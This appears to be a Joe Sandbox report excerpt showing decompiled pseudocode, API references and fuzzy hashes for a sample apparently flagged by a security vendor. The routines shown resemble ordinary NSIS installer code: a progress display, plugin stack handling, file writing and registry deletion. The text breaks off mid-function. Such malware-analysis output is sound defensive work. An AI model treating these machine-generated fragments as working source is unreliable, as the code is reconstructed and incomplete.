                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                  				short _v132;
                                                  				int _t11;
                                                  				int _t20;
                                                  
                                                  				if(_a8 == 0x110) {
                                                  					SetTimer(_a4, 1, 0xfa, 0);
                                                  					_a8 = 0x113;
                                                  				}
                                                  				if(_a8 == 0x113) {
                                                  					_t20 =  *0x41ea18; // 0xf60c7
                                                  					_t11 =  *0x42aa24; // 0xf60cb
                                                  					if(_t20 >= _t11) {
                                                  						_t20 = _t11;
                                                  					}
                                                  					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                  					SetWindowTextW(_a4,  &_v132);
                                                  					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                  				}
                                                  				return 0;
                                                  			}






                                                  0x00402fa3
                                                  0x00402fb1
                                                  0x00402fb7
                                                  0x00402fb7
                                                  0x00402fc5
                                                  0x00402fc7
                                                  0x00402fcd
                                                  0x00402fd4
                                                  0x00402fd6
                                                  0x00402fd6
                                                  0x00402fec
                                                  0x00402ffc
                                                  0x0040300e
                                                  0x0040300e
                                                  0x00403016

                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                  • MulDiv.KERNEL32(000F60C7,00000064,000F60CB), ref: 00402FDC
                                                  • wsprintfW.USER32 ref: 00402FEC
                                                  • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 00402FE6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                  • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                  • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                  • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 75%
                                                  			E71082655() {
                                                  				intOrPtr _t24;
                                                  				void* _t26;
                                                  				intOrPtr _t27;
                                                  				signed int _t39;
                                                  				void* _t40;
                                                  				void* _t43;
                                                  				intOrPtr _t44;
                                                  				void* _t45;
                                                  
                                                  				_t40 = E710812BB();
                                                  				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                  				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                  				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                  				do {
                                                  					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                  					}
                                                  					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                  					if(_t39 <= 7) {
                                                  						switch( *((intOrPtr*)(_t39 * 4 +  &M71082784))) {
                                                  							case 0:
                                                  								 *_t40 = 0;
                                                  								goto L17;
                                                  							case 1:
                                                  								__eax =  *__eax;
                                                  								if(__ecx > __ebx) {
                                                  									 *(__esp + 0x10) = __ecx;
                                                  									__ecx =  *(0x7108407c + __edx * 4);
                                                  									__edx =  *(__esp + 0x10);
                                                  									__ecx = __ecx * __edx;
                                                  									asm("sbb edx, edx");
                                                  									__edx = __edx & __ecx;
                                                  									__eax = __eax &  *(0x7108409c + __edx * 4);
                                                  								}
                                                  								_push(__eax);
                                                  								goto L15;
                                                  							case 2:
                                                  								__eax = E71081510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                  								goto L16;
                                                  							case 3:
                                                  								__ecx =  *0x7108506c;
                                                  								__edx = __ecx - 1;
                                                  								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                  								__eax =  *0x7108506c;
                                                  								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                  								goto L17;
                                                  							case 4:
                                                  								__eax = lstrcpynW(__edi,  *__eax,  *0x7108506c);
                                                  								goto L17;
                                                  							case 5:
                                                  								_push( *0x7108506c);
                                                  								_push(__edi);
                                                  								_push( *__eax);
                                                  								__imp__StringFromGUID2();
                                                  								goto L17;
                                                  							case 6:
                                                  								_push( *__esi);
                                                  								L15:
                                                  								__eax = wsprintfW(__edi, 0x71085000);
                                                  								L16:
                                                  								__esp = __esp + 0xc;
                                                  								goto L17;
                                                  						}
                                                  					}
                                                  					L17:
                                                  					_t26 =  *(_t43 + 0x14);
                                                  					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                  						GlobalFree(_t26);
                                                  					}
                                                  					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                  					if(_t27 != 0) {
                                                  						if(_t27 != 0xffffffff) {
                                                  							if(_t27 > 0) {
                                                  								E71081381(_t27 - 1, _t40);
                                                  								goto L26;
                                                  							}
                                                  						} else {
                                                  							E71081312(_t40);
                                                  							L26:
                                                  						}
                                                  					}
                                                  					_t44 = _t44 - 1;
                                                  					_t43 = _t43 - 0x20;
                                                  				} while (_t44 >= 0);
                                                  				return GlobalFree(_t40);
                                                  			}











                                                  0x7108265f
                                                  0x71082661
                                                  0x71082665
                                                  0x71082674
                                                  0x71082678
                                                  0x7108267d
                                                  0x7108267d
                                                  0x71082685
                                                  0x7108268c
                                                  0x71082692
                                                  0x00000000
                                                  0x71082699
                                                  0x00000000
                                                  0x00000000
                                                  0x710826a1
                                                  0x710826a5
                                                  0x710826a8
                                                  0x710826ac
                                                  0x710826b3
                                                  0x710826b7
                                                  0x710826bd
                                                  0x710826bf
                                                  0x710826c1
                                                  0x710826c1
                                                  0x710826c8
                                                  0x00000000
                                                  0x00000000
                                                  0x710826d1
                                                  0x00000000
                                                  0x00000000
                                                  0x710826d8
                                                  0x710826de
                                                  0x710826e8
                                                  0x710826ee
                                                  0x710826f3
                                                  0x00000000
                                                  0x00000000
                                                  0x71082714
                                                  0x00000000
                                                  0x00000000
                                                  0x710826fa
                                                  0x71082700
                                                  0x71082701
                                                  0x71082703
                                                  0x00000000
                                                  0x00000000
                                                  0x7108271c
                                                  0x7108271e
                                                  0x71082724
                                                  0x7108272a
                                                  0x7108272a
                                                  0x00000000
                                                  0x00000000
                                                  0x71082692
                                                  0x7108272d
                                                  0x7108272d
                                                  0x71082732
                                                  0x71082743
                                                  0x71082743
                                                  0x71082749
                                                  0x7108274e
                                                  0x71082753
                                                  0x7108275f
                                                  0x71082764
                                                  0x00000000
                                                  0x71082769
                                                  0x71082755
                                                  0x71082756
                                                  0x7108276a
                                                  0x7108276a
                                                  0x71082753
                                                  0x7108276b
                                                  0x7108276c
                                                  0x7108276f
                                                  0x71082783

                                                  APIs
                                                    • Part of subcall function 710812BB: GlobalAlloc.KERNEL32(00000040,?,710812DB,?,7108137F,00000019,710811CA,-000000A0), ref: 710812C5
                                                  • GlobalFree.KERNEL32(?), ref: 71082743
                                                  • GlobalFree.KERNEL32(00000000), ref: 71082778
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.970618355.0000000071081000.00000020.00000001.01000000.00000004.sdmp, Offset: 71080000, based on PE: true
                                                  • Associated: 00000000.00000002.970532047.0000000071080000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.970731155.0000000071084000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.970830151.0000000071086000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71080000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: 9d0c107f96a5c312663a7de280b98fe504cf3131cc3db23df2beb19a1e067c5e
                                                  • Instruction ID: 06cfcc4eb01b996b1f37b4ab9e6c739c2df0b84e83600c4cdbc538dab1ceb3bf
                                                  • Opcode Fuzzy Hash: 9d0c107f96a5c312663a7de280b98fe504cf3131cc3db23df2beb19a1e067c5e
                                                  • Instruction Fuzzy Hash: D331B07250C502EFC717AF76CD84E2E7BF6FB85B443244569F24297250C7326816CB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 86%
                                                  			E00402950(int __ebx, void* __eflags) {
                                                  				WCHAR* _t26;
                                                  				void* _t29;
                                                  				long _t37;
                                                  				int _t49;
                                                  				void* _t52;
                                                  				void* _t54;
                                                  				void* _t56;
                                                  				void* _t59;
                                                  				void* _t60;
                                                  				void* _t61;
                                                  
                                                  				_t49 = __ebx;
                                                  				_t52 = 0xfffffd66;
                                                  				_t26 = E00402DA6(0xfffffff0);
                                                  				_t55 = _t26;
                                                  				 *(_t61 - 0x40) = _t26;
                                                  				if(E00405E83(_t26) == 0) {
                                                  					E00402DA6(0xffffffed);
                                                  				}
                                                  				E00406008(_t55);
                                                  				_t29 = E0040602D(_t55, 0x40000000, 2);
                                                  				 *(_t61 + 8) = _t29;
                                                  				if(_t29 != 0xffffffff) {
                                                  					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                  					if( *(_t61 - 0x28) != _t49) {
                                                  						_t37 =  *0x434f14;
                                                  						 *(_t61 - 0x44) = _t37;
                                                  						_t54 = GlobalAlloc(0x40, _t37);
                                                  						if(_t54 != _t49) {
                                                  							E004034E5(_t49);
                                                  							E004034CF(_t54,  *(_t61 - 0x44));
                                                  							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                  							 *(_t61 - 0x10) = _t59;
                                                  							if(_t59 != _t49) {
                                                  								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                  								while( *_t59 != _t49) {
                                                  									_t60 = _t59 + 8;
                                                  									 *(_t61 - 0x3c) =  *_t59;
                                                  									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                  									_t59 = _t60 +  *(_t61 - 0x3c);
                                                  								}
                                                  								GlobalFree( *(_t61 - 0x10));
                                                  							}
                                                  							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                  							GlobalFree(_t54);
                                                  							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                  						}
                                                  					}
                                                  					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                  					CloseHandle( *(_t61 + 8));
                                                  				}
                                                  				_t56 = 0xfffffff3;
                                                  				if(_t52 < _t49) {
                                                  					_t56 = 0xffffffef;
                                                  					DeleteFileW( *(_t61 - 0x40));
                                                  					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                  				}
                                                  				_push(_t56);
                                                  				E00401423();
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
                                                  				return 0;
                                                  			}













                                                  0x00402950
                                                  0x00402952
                                                  0x00402957
                                                  0x0040295c
                                                  0x0040295f
                                                  0x00402969
                                                  0x0040296d
                                                  0x0040296d
                                                  0x00402973
                                                  0x00402980
                                                  0x00402988
                                                  0x0040298b
                                                  0x00402997
                                                  0x0040299a
                                                  0x004029a0
                                                  0x004029ae
                                                  0x004029b3
                                                  0x004029b7
                                                  0x004029ba
                                                  0x004029c3
                                                  0x004029cf
                                                  0x004029d3
                                                  0x004029d6
                                                  0x004029e0
                                                  0x004029ff
                                                  0x004029ec
                                                  0x004029f4
                                                  0x004029f7
                                                  0x004029fc
                                                  0x004029fc
                                                  0x00402a06
                                                  0x00402a06
                                                  0x00402a13
                                                  0x00402a19
                                                  0x00402a1f
                                                  0x00402a1f
                                                  0x004029b7
                                                  0x00402a33
                                                  0x00402a35
                                                  0x00402a35
                                                  0x00402a3f
                                                  0x00402a40
                                                  0x00402a44
                                                  0x00402a48
                                                  0x00402a4e
                                                  0x00402a4e
                                                  0x00402a55
                                                  0x004022f1
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                  • GlobalFree.KERNEL32(?), ref: 00402A06
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                  • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                  • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                  • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 85%
                                                  			E71082480(void* __edx) {
                                                  				void* _t37;
                                                  				signed int _t38;
                                                  				void* _t39;
                                                  				void* _t41;
                                                  				signed char* _t42;
                                                  				signed char* _t51;
                                                  				void* _t52;
                                                  				void* _t54;
                                                  
                                                  				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                  				while(1) {
                                                  					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                  					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                  					_t52 = _t51[0x18];
                                                  					if(_t52 == 0) {
                                                  						goto L9;
                                                  					}
                                                  					_t41 = 0x1a;
                                                  					if(_t52 == _t41) {
                                                  						goto L9;
                                                  					}
                                                  					if(_t52 != 0xffffffff) {
                                                  						if(_t52 <= 0 || _t52 > 0x19) {
                                                  							_t51[0x18] = _t41;
                                                  							goto L12;
                                                  						} else {
                                                  							_t37 = E7108135A(_t52 - 1);
                                                  							L10:
                                                  							goto L11;
                                                  						}
                                                  					} else {
                                                  						_t37 = E710812E3();
                                                  						L11:
                                                  						_t52 = _t37;
                                                  						L12:
                                                  						_t13 =  &(_t51[8]); // 0x1020
                                                  						_t42 = _t13;
                                                  						if(_t51[4] >= 0) {
                                                  						}
                                                  						_t38 =  *_t51 & 0x000000ff;
                                                  						_t51[0x1c] = 0;
                                                  						if(_t38 > 7) {
                                                  							L27:
                                                  							_t39 = GlobalFree(_t52);
                                                  							if( *(_t54 + 0x10) == 0) {
                                                  								return _t39;
                                                  							}
                                                  							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                  								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                  							} else {
                                                  								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                  							}
                                                  							continue;
                                                  						} else {
                                                  							switch( *((intOrPtr*)(_t38 * 4 +  &M710825F8))) {
                                                  								case 0:
                                                  									 *_t42 = 0;
                                                  									goto L27;
                                                  								case 1:
                                                  									__eax = E710813B1(__ebp);
                                                  									goto L21;
                                                  								case 2:
                                                  									 *__edi = E710813B1(__ebp);
                                                  									__edi[1] = __edx;
                                                  									goto L27;
                                                  								case 3:
                                                  									__eax = GlobalAlloc(0x40,  *0x7108506c);
                                                  									 *(__esi + 0x1c) = __eax;
                                                  									__edx = 0;
                                                  									 *__edi = __eax;
                                                  									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x7108506c, __eax,  *0x7108506c, 0, 0);
                                                  									goto L27;
                                                  								case 4:
                                                  									__eax = E710812CC(__ebp);
                                                  									 *(__esi + 0x1c) = __eax;
                                                  									L21:
                                                  									 *__edi = __eax;
                                                  									goto L27;
                                                  								case 5:
                                                  									__eax = GlobalAlloc(0x40, 0x10);
                                                  									_push(__eax);
                                                  									 *(__esi + 0x1c) = __eax;
                                                  									_push(__ebp);
                                                  									 *__edi = __eax;
                                                  									__imp__CLSIDFromString();
                                                  									goto L27;
                                                  								case 6:
                                                  									if( *__ebp != __cx) {
                                                  										__eax = E710813B1(__ebp);
                                                  										 *__ebx = __eax;
                                                  									}
                                                  									goto L27;
                                                  								case 7:
                                                  									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                  									( *(__esi + 0x18) - 1) *  *0x7108506c =  *0x71085074 + ( *(__esi + 0x18) - 1) *  *0x7108506c * 2 + 0x18;
                                                  									 *__ebx =  *0x71085074 + ( *(__esi + 0x18) - 1) *  *0x7108506c * 2 + 0x18;
                                                  									asm("cdq");
                                                  									__eax = E71081510(__edx,  *0x71085074 + ( *(__esi + 0x18) - 1) *  *0x7108506c * 2 + 0x18, __edx,  *0x71085074 + ( *(__esi + 0x18) - 1) *  *0x7108506c * 2);
                                                  									goto L27;
                                                  							}
                                                  						}
                                                  					}
                                                  					L9:
                                                  					_t37 = E710812CC(0x71085044);
                                                  					goto L10;
                                                  				}
                                                  			}











                                                  0x71082494
                                                  0x71082498
                                                  0x710824a3
                                                  0x710824a3
                                                  0x710824aa
                                                  0x710824af
                                                  0x00000000
                                                  0x00000000
                                                  0x710824b3
                                                  0x710824b6
                                                  0x00000000
                                                  0x00000000
                                                  0x710824bb
                                                  0x710824c6
                                                  0x710824d6
                                                  0x00000000
                                                  0x710824cd
                                                  0x710824cf
                                                  0x710824e5
                                                  0x00000000
                                                  0x710824e5
                                                  0x710824bd
                                                  0x710824bd
                                                  0x710824e6
                                                  0x710824e6
                                                  0x710824e8
                                                  0x710824ec
                                                  0x710824ec
                                                  0x710824ef
                                                  0x710824ef
                                                  0x710824f7
                                                  0x710824ff
                                                  0x71082502
                                                  0x710825c1
                                                  0x710825c2
                                                  0x710825cd
                                                  0x710825f7
                                                  0x710825f7
                                                  0x710825dd
                                                  0x710825e9
                                                  0x710825df
                                                  0x710825df
                                                  0x710825df
                                                  0x00000000
                                                  0x71082508
                                                  0x71082508
                                                  0x00000000
                                                  0x7108250f
                                                  0x00000000
                                                  0x00000000
                                                  0x71082517
                                                  0x00000000
                                                  0x00000000
                                                  0x71082525
                                                  0x71082527
                                                  0x00000000
                                                  0x00000000
                                                  0x71082548
                                                  0x7108254e
                                                  0x71082551
                                                  0x71082553
                                                  0x71082563
                                                  0x00000000
                                                  0x00000000
                                                  0x71082530
                                                  0x71082535
                                                  0x71082538
                                                  0x71082539
                                                  0x00000000
                                                  0x00000000
                                                  0x7108256f
                                                  0x71082575
                                                  0x71082576
                                                  0x71082579
                                                  0x7108257a
                                                  0x7108257c
                                                  0x00000000
                                                  0x00000000
                                                  0x71082588
                                                  0x7108258b
                                                  0x71082597
                                                  0x71082599
                                                  0x00000000
                                                  0x00000000
                                                  0x710825a5
                                                  0x710825b1
                                                  0x710825b4
                                                  0x710825b6
                                                  0x710825b9
                                                  0x00000000
                                                  0x00000000
                                                  0x71082508
                                                  0x71082502
                                                  0x710824db
                                                  0x710824e0
                                                  0x00000000
                                                  0x710824e0

                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 710825C2
                                                    • Part of subcall function 710812CC: lstrcpynW.KERNEL32(00000000,?,7108137F,00000019,710811CA,-000000A0), ref: 710812DC
                                                  • GlobalAlloc.KERNEL32(00000040), ref: 71082548
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 71082563
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.970618355.0000000071081000.00000020.00000001.01000000.00000004.sdmp, Offset: 71080000, based on PE: true
                                                  • Associated: 00000000.00000002.970532047.0000000071080000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.970731155.0000000071084000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.970830151.0000000071086000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71080000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                  • String ID:
                                                  • API String ID: 4216380887-0
                                                  • Opcode ID: 218f00f635cd509ce996ccf8f36484957aab7b80cf2c8a4174c9646264b14c4b
                                                  • Instruction ID: 3810e5dc1d271d7b8a1d5f7094142780c7e12569479a807f4a8d16a4a316bbfe
                                                  • Opcode Fuzzy Hash: 218f00f635cd509ce996ccf8f36484957aab7b80cf2c8a4174c9646264b14c4b
                                                  • Instruction Fuzzy Hash: 734199B100C306EFD7159F399844A2A7BF9FB94B10F10895EF94786581EB31A549CBB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 48%
                                                  			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                  				void* _v8;
                                                  				int _v12;
                                                  				short _v536;
                                                  				void* _t27;
                                                  				signed int _t33;
                                                  				intOrPtr* _t35;
                                                  				signed int _t45;
                                                  				signed int _t46;
                                                  				signed int _t47;
                                                  
                                                  				_t46 = _a12;
                                                  				_t47 = _t46 & 0x00000300;
                                                  				_t45 = _t46 & 0x00000001;
                                                  				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                  				if(_t27 == 0) {
                                                  					if((_a12 & 0x00000002) == 0) {
                                                  						L3:
                                                  						_push(0x105);
                                                  						_push( &_v536);
                                                  						_push(0);
                                                  						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                  							__eflags = _t45;
                                                  							if(__eflags != 0) {
                                                  								L10:
                                                  								RegCloseKey(_v8);
                                                  								return 0x3eb;
                                                  							}
                                                  							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                  							__eflags = _t33;
                                                  							if(_t33 != 0) {
                                                  								break;
                                                  							}
                                                  							_push(0x105);
                                                  							_push( &_v536);
                                                  							_push(_t45);
                                                  						}
                                                  						RegCloseKey(_v8);
                                                  						_t35 = E0040690A(3);
                                                  						if(_t35 != 0) {
                                                  							return  *_t35(_a4, _a8, _t47, 0);
                                                  						}
                                                  						return RegDeleteKeyW(_a4, _a8);
                                                  					}
                                                  					_v12 = 0;
                                                  					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                  						goto L10;
                                                  					}
                                                  					goto L3;
                                                  				}
                                                  				return _t27;
                                                  			}












                                                  0x00402eb4
                                                  0x00402ebd
                                                  0x00402ec6
                                                  0x00402ed2
                                                  0x00402edb
                                                  0x00402ee5
                                                  0x00402f0a
                                                  0x00402f10
                                                  0x00402f15
                                                  0x00402f16
                                                  0x00402f46
                                                  0x00402f1f
                                                  0x00402f21
                                                  0x00402f71
                                                  0x00402f74
                                                  0x00000000
                                                  0x00402f7a
                                                  0x00402f30
                                                  0x00402f35
                                                  0x00402f37
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f3f
                                                  0x00402f44
                                                  0x00402f45
                                                  0x00402f45
                                                  0x00402f52
                                                  0x00402f5a
                                                  0x00402f61
                                                  0x00000000
                                                  0x00402f8a
                                                  0x00000000
                                                  0x00402f69
                                                  0x00402ef5
                                                  0x00402f08
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f08
                                                  0x00402f90

                                                  APIs
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CloseEnum$DeleteValue
                                                  • String ID:
                                                  • API String ID: 1354259210-0
                                                  • Opcode ID: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                  • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                  • Opcode Fuzzy Hash: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                  • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 77%
                                                  			E00401D81(void* __ebx, void* __edx) {
                                                  				struct HWND__* _t30;
                                                  				WCHAR* _t38;
                                                  				void* _t48;
                                                  				void* _t53;
                                                  				signed int _t55;
                                                  				signed int _t60;
                                                  				long _t63;
                                                  				void* _t65;
                                                  
                                                  				_t53 = __ebx;
                                                  				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                  					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                  				} else {
                                                  					E00402D84(2);
                                                  					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                  				}
                                                  				_t55 =  *(_t65 - 0x24);
                                                  				 *(_t65 + 8) = _t30;
                                                  				_t60 = _t55 & 0x00000004;
                                                  				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                  				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                  				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                  				if((_t55 & 0x00010000) == 0) {
                                                  					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                  				} else {
